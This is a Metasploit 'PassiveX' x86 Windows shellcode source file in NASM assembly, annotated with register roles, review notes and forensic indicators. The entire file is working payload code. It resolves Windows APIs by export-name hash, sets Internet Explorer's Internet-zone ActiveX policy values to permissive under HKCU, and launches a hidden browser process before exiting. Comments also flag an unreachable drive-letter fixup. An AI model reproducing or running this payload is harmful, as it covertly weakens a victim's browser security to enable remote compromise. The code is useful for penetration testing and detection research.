GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/shellcode/windows/msf2/passivex.asm
;-----------------------------------------------------------------------
; Metasploit "PassiveX" x86 payload (NASM syntax, 32-bit, position
; independent). Control flow as written:
;   1. locate kernel32 through fs:[0x30] (PEB) or the Win9x fallback,
;   2. resolve LoadLibraryA / CreateProcessA / ExitProcess by the
;      ror-13/add export-name hash in find_function,
;   3. LoadLibraryA("advapi32"), resolve two registry APIs,
;   4. open/create HKCU\Software\Microsoft\Windows\CurrentVersion\
;      Internet Settings\Zones\3 and write values 1004, 1200, 1201, 1001
;      as REG_DWORD 0 (IE Internet-zone ActiveX policy values),
;   5. CreateProcessA("C:\progra~1\intern~1\iexplore -new") with a hidden
;      window on desktop WinSta0\Default, then ExitProcess.
; Host-side artifacts for detection/forensics: the four Zones\3 value
; writes and a child iexplore.exe started with "-new" by a process that
; immediately exits.
; There is no error handling anywhere: each API call is assumed to
; return 0 (success) in eax, and that 0 is then reused as NULL argument,
; string terminator and fill byte for the next step.
; Register roles after startup: edi = &find_function, ebx/esi = &strings,
; ebp = scratch table for resolved APIs ([ebp]=CreateProcessA,
; [ebp+4]=ExitProcess, [ebp+8]=RegSetValueExA), edx = 0.
;-----------------------------------------------------------------------
BITS 32
GLOBAL _start

_start:
cld                                     ; lodsb/lodsd/stosb must walk forward
call get_find_function                  ; pushes &strings as the "return address"
strings:
db "Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", 0x0
reg_values:
; Four 4-char value names, consumed one dword at a time by set_values.
; Only the 'C' of the url string below terminates that loop.
db "1004120012011001"
url:
db "C:\progra~1\intern~1\iexplore -new", 0x0

get_find_function:
call startup                            ; pushes &find_function, then startup pops it

;-----------------------------------------------------------------------
; find_function(base, hash)  -- __stdcall, retn 8
; In:    [esp+4] = module base, [esp+8] = ror-13 hash of an export name
; Out:   eax = VA of the export; if no name matches, eax is left as the
;        caller had it (no not-found signal)
; Clobb: flags only (pushad/popad); the result is written into the
;        saved-eax slot of the pushad frame so popad returns it.
; PE offsets used: 0x3c e_lfanew, +0x78 export-directory RVA,
;        0x18 NumberOfNames, 0x20 AddressOfNames,
;        0x24 AddressOfNameOrdinals, 0x1c AddressOfFunctions.
;-----------------------------------------------------------------------
find_function:
pushad                                  ; 8 dwords; args now at esp+0x24 / esp+0x28
mov ebp, [esp + 0x24]                   ; ebp = module base
mov eax, [ebp + 0x3c]                   ; eax = e_lfanew
mov edi, [ebp + eax + 0x78]             ; edi = export directory RVA
add edi, ebp                            ; edi = &IMAGE_EXPORT_DIRECTORY
mov ecx, [edi + 0x18]                   ; ecx = NumberOfNames (loop counter)
mov ebx, [edi + 0x20]                   ; ebx = AddressOfNames RVA
add ebx, ebp                            ; ebx = &AddressOfNames[]
find_function_loop:
jecxz find_function_finished            ; every name tried: give up silently
dec ecx                                 ; walk the name table backwards
mov esi, [ebx + ecx * 4]                ; esi = RVA of name[ecx]
add esi, ebp                            ; esi = &name[ecx]
compute_hash:
xor eax, eax
cdq                                     ; edx = 0 (hash accumulator), eax = 0
compute_hash_again:
lodsb                                   ; al = next name byte
test al, al
jz compute_hash_finished                ; NUL terminator ends the name
ror edx, 0xd                            ; hash = ror(hash, 13) + byte
add edx, eax
jmp compute_hash_again
compute_hash_finished:
find_function_compare:
cmp edx, [esp + 0x28]                   ; does the hash match the requested one?
jnz find_function_loop
mov ebx, [edi + 0x24]                   ; ebx = AddressOfNameOrdinals RVA
add ebx, ebp
mov cx, [ebx + 2 * ecx]                 ; cx = ordinal; upper half of ecx keeps the
                                        ; (small) name index, assumed < 0x10000
mov ebx, [edi + 0x1c]                   ; ebx = AddressOfFunctions RVA
add ebx, ebp
mov eax, [ebx + 4 * ecx]                ; eax = function RVA
add eax, ebp                            ; eax = function VA
mov [esp + 0x1c], eax                   ; overwrite saved eax so popad returns it
find_function_finished:
popad
retn 8                                  ; pop both arguments (stdcall)

;-----------------------------------------------------------------------
; startup -- entered with [esp] = &find_function and [esp+4] = &strings
;-----------------------------------------------------------------------
startup:
pop edi                                 ; edi = &find_function
pop ebx                                 ; ebx = &strings
find_kernel32:
xor edx, edx                            ; edx = 0; also avoids a NUL byte in fs:[0x30]
mov eax, [fs:edx+0x30]                  ; eax = PEB on NT
test eax, eax
js find_kernel32_9x                     ; sign bit set => not an NT PEB (Win9x path)
find_kernel32_nt:
mov eax, [eax + 0x0c]                   ; eax = PEB->Ldr
mov esi, [eax + 0x1c]                   ; esi = InInitializationOrderModuleList.Flink
lodsd                                   ; eax = second entry in that list
mov eax, [eax + 0x8]                    ; eax = its DllBase
; NOTE(review): relies on kernel32 being the second module in initialization
; order, which holds on NT4/2000/XP-era systems -- TODO confirm on newer
; Windows versions, where the list order differs.
jmp short find_kernel32_finished
find_kernel32_9x:
mov eax, [eax + 0x34]                   ; Win9x-specific walk to the kernel32 base
add eax, byte 0x7c
mov eax, [eax + 0x3c]
find_kernel32_finished:

mov ebp, esp                            ; [ebp], [ebp+4], [ebp+8] reused as an API table
find_kernel32_symbols:
; Three (hash, base) argument pairs; each call edi consumes one pair.
push 0x73e2d87e ; ExitProcess
push eax
push 0x16b3fe72 ; CreateProcessA
push eax
push 0xec0e4e8e ; LoadLibraryA
push eax
call edi                                ; eax = LoadLibraryA
xchg eax, esi                           ; esi = LoadLibraryA
call edi                                ; eax = CreateProcessA
mov [ebp], eax
call edi                                ; eax = ExitProcess
mov [ebp + 0x4], eax

load_advapi32:
push edx                                ; NUL terminator (edx is still 0)
push 0x32336970                         ; "pi32"
push 0x61766461                         ; "adva"  => "advapi32\0" on the stack
push esp                                ; lpLibFileName
call esi                                ; eax = LoadLibraryA("advapi32")

resolve_advapi32_symbols:
push 0x02922ba9
push eax
push 0x2d1c9add
push eax
call edi                                ; resolves 0x2d1c9add
mov [ebp + 0x8], eax                    ; called below with the 6-arg RegSetValueExA shape
call edi                                ; resolves 0x02922ba9
xchg eax, edi                           ; edi = that API; eax = &find_function (unused now)

xchg esi, ebx                           ; esi = &strings; LoadLibraryA no longer needed
open_key:
; Three-argument call (hKey, lpSubKey, phkResult): consistent with
; RegCreateKeyA / RegOpenKeyA -- the hash itself is not identified here.
push esp                                ; phkResult -> current top-of-stack slot
push esi                                ; lpSubKey = "Software\...\Zones\3"
push 0x80000001                         ; HKEY_CURRENT_USER
call edi
pop ebx                                 ; ebx = HKEY written by the API into that slot
add esi, byte (reg_values - strings)    ; esi = &reg_values (distance must fit in a byte)

push eax                                ; eax assumed 0 (ERROR_SUCCESS): a zero DWORD ...
mov edi, esp                            ; ... edi = lpData = &0
set_values:
cmp byte [esi], 'C'                     ; reached the url string => all values written
jz initialize_structs
push eax                                ; NUL terminator for the value name
lodsd                                   ; eax = next 4-char value name
push eax                                ; "NNNN\0" now on the stack
mov eax, esp                            ; lpValueName
push byte 0x4                           ; cbData = 4
push edi                                ; lpData = &0
push byte 0x4                           ; dwType = REG_DWORD
push byte 0x0                           ; Reserved
push eax                                ; lpValueName
push ebx                                ; hKey
call [ebp + 0x8]                        ; RegSetValueExA(...) -> value = 0
jmp set_values                          ; each iteration leaves 8 bytes of name on the stack

; This is NT specific, but it lets us execute iexplore regardless
; of what drive it's installed on so long as it's on the same drive
; as the WINDOWS directory, which it should always be.
; NOTE(review): unreachable as written -- the set_values loop only exits via
; `jz initialize_structs`, which jumps past this block, so the url keeps its
; literal "C:" prefix. 0x7ffe0030 is the first byte of the UNICODE SystemRoot
; path in the shared user data page; the store would patch the url in place.
fixup_drive_letter:
mov cl, byte [0x7ffe0030]
mov byte [esi], cl

initialize_structs:
; Reserve 0x54 bytes: STARTUPINFOA (0x44) followed by PROCESS_INFORMATION (0x10).
push byte 0x54
pop ecx                                 ; ecx = 0x54 without a NUL byte in the encoding
sub esp, ecx
mov edi, esp                            ; edi = &STARTUPINFOA
push edi
rep stosb                               ; zero-fill; al assumed 0 from the last API status
pop edi
mov byte [edi], 0x44                    ; si.cb = sizeof(STARTUPINFOA)
inc byte [edi + 0x2c]                   ; si.dwFlags |= STARTF_USESHOWWINDOW (0x1)
inc byte [edi + 0x2d]                   ; si.dwFlags |= STARTF_USESTDHANDLES (0x100);
                                        ; wShowWindow stays 0 = SW_HIDE, std handles NULL

; set lpDesktop to WinSta0\Default so that this works with non-interactive services
push 0x00746c75                         ; "ult\0"
push 0x61666544                         ; "Defa"
push 0x5c306174                         ; "ta0\"
push 0x536e6957                         ; "WinS"
mov [edi + 8], esp                      ; si.lpDesktop

execute_process:
; CreateProcessA arguments pushed right-to-left; eax is still assumed 0.
lea ebx, [edi + 0x44]                   ; &PROCESS_INFORMATION
push ebx                                ; lpProcessInformation
push edi                                ; lpStartupInfo
push eax                                ; lpCurrentDirectory = NULL
push eax                                ; lpEnvironment = NULL
push byte 0x10                          ; dwCreationFlags = CREATE_NEW_CONSOLE
push eax                                ; bInheritHandles = FALSE
push eax                                ; lpThreadAttributes = NULL
push eax                                ; lpProcessAttributes = NULL
push esi                                ; lpCommandLine = url ("C:\progra~1\intern~1\iexplore -new")
push eax                                ; lpApplicationName = NULL
call [ebp]                              ; CreateProcessA

exit_process:
call [ebp + 0x4]                        ; ExitProcess(<whatever is on top of the stack>)
